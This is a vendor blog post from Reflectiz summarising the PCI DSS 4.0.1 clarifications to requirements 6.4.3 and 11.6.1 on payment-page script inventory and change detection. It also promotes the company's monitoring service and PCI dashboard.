The PCI Security Standards Council (PCI-SSC) released PCI DSS 4.0.1 in June 2024, a limited revision that replaces version 4.0 at the end of December 2024. V4.0 added 64 new requirements after v3.2.4 was retired but have no fear online merchants! PCI DSS 4.0.1 doesn’t add any more. Instead, it’s more of a housekeeping exercise in response to community feedback that clarifies language and clears up some typos and formatting issues. You can read about everything they’ve amended in PCI-SSC’s Summary of Changes document, available here. There are quite a few of them, so in this article, we will focus on the revisions to sections that Reflectiz helps you manage.
PCI DSS 4.0.1: Section 6.4.3
PCI DSS 4.0.1, section 6.4.3 requires website owners to implement a method to confirm that each script that’s present on their payment pages is authorized, justified, and secure. But it’s now common for merchants to use third-party service providers to process customer payments, with their scripts loaded into an iFrame, so the update now clarifies that merchants are not responsible for them. That responsibility rests with the third-party provider, and the guidance also says that merchants can expect them to provide proof that they comply with the requirements of section 6.4.3, in line with section 12.9 (Third-party service providers (TPSPs) support their customers’ PCI DSS compliance.)
This was always the intention, but the update makes it clear. Merchants are only responsible for ensuring the integrity, necessity, and authorization of scripts loaded into their own pages.
Under previous guidance, the merchant was expected to authorize scripts before they were loaded but since this would be almost impossible to do, the emphasis has shifted to carrying out real-time threat monitoring. This is exactly what Reflectiz does, and users benefit from its ability to scan for changes in any iFrame, which are opaque to embedded security solutions.
The guidance says, “Where the payment page will be loaded into an inline frame (iframe), restricting the location that the payment page can be loaded from, using the parent page’s Content Security Policy (CSP) can help prevent unauthorized content being substituted for the payment page,” which would also be helpful.
6.4.3 also says (under the Defined Approach) – An inventory of all scripts is maintained with written business or technical justification as to why each is necessary. This is a tightening up of the requirement from 4.0, which said that merchants needed to show that scripts were, “needed for the functionality of the payment page to accept a payment transaction.” This adds business reasons as an option because businesses often put scripts on the payment page that are not directly related to accepting payments. This isn’t a green light to add them willy-nilly though. A best practice is still to use as few as possible to keep the attack surface as small as possible.
PCI DSS 4.0.1: Section 11.6.1
PCI DSS 4.0.1, section 11.6.1 focuses on detecting and responding to unauthorized changes to payment pages as received by the customer’s browser. It clarifies that this requirement applies to, “security-impacting HTTP headers and the script contents of payment pages…” Doing this reflects feedback received from the community.
- It changes the previous “once every seven days” to “weekly” to align with Table 4 (see page 25).
- It adds three Applicability Notes to clarify how the requirement applies to the merchant’s webpage(s) and the third-party payment processor’s embedded payment pages or forms.
- Purpose isexpanded to include more details about what can be detected when comparing HTTP headers and the content of payment pages received by the customer’s browser.
- Under Good Practice, it reiterates the guidance that any third-party payment processor can be expected to provide evidence that it meets this requirement if its forms are included on the payment page.
- It clarifies that in the Examples section, the mechanisms that detect and report on changes to headers and content of payment pages “could include, but are not limited to, a combination of the following techniques”. It adds that this list is not exhaustive. This is to ensure that website owners know they can fulfill this requirement using whatever combination of tools and techniques they deem to be most appropriate.
One of those should be Reflectiz, as it now includes smart approvals that save you time while boosting efficiency and security. In fact, it’s what this part of the guidance calls for:
External monitoring by systems that request and analyze the received web pages (also known as synthetic user monitoring) can detect changes to JavaScript in payment pages and alert personnel.
This ‘synthetic user monitoring’ is exactly what Reflectiz does, so a Reflectiz scan places no more resource overhead on your website than a single visitor would. The intelligent approval system allows you to define acceptable script behaviors and automate the approval process for compliant scripts. This frees up your security teams to focus on reviewing exceptions and makes it easy for them to manage multiple payment pages.
Dedicated PCI Dashboard
We’ve made the process of managing your PCI DSS 4.0.1 compliance more streamlined with the introduction of our dedicated PCI dashboard (try it free for 30 days!) It lets you easily monitor and manage all payment page scripts that are loaded and executed in the customer’s browser and alerts you when unauthorized modifications take place, thanks to its advanced change and tamper detection mechanism.
Evidence gathering and reporting is a potentially time-consuming requirement of PCI DSS 4.0.1, but the PCI Dashboard cuts it down to size, letting you generate compliance reports for Quality Security Assessors at the touch of a button.
Reflectiz also offers watertight web security that goes beyond PCI compliance. It creates an inventory of all third-party scripts and applications (and not just those that have access to payments and credit card data), and provides ongoing monitoring, with prioritized reports, customized to match your organization’s risk appetite.
There’s nothing to install with this sophisticated compliance and continuous threat management solution, as it’s executed remotely. Your security teams gain immediate real-time visibility over your online ecosystem, to keep your system and your customers’ sensitive payment data safe. Sign up today!
Subscribe to our newsletter
Stay updated with the latest news, articles, and insights from Reflectiz.
Your Website looks great!
But what’s happening behind the scenes?
Discover your website blind spots and vulnerabilities before it’s too late!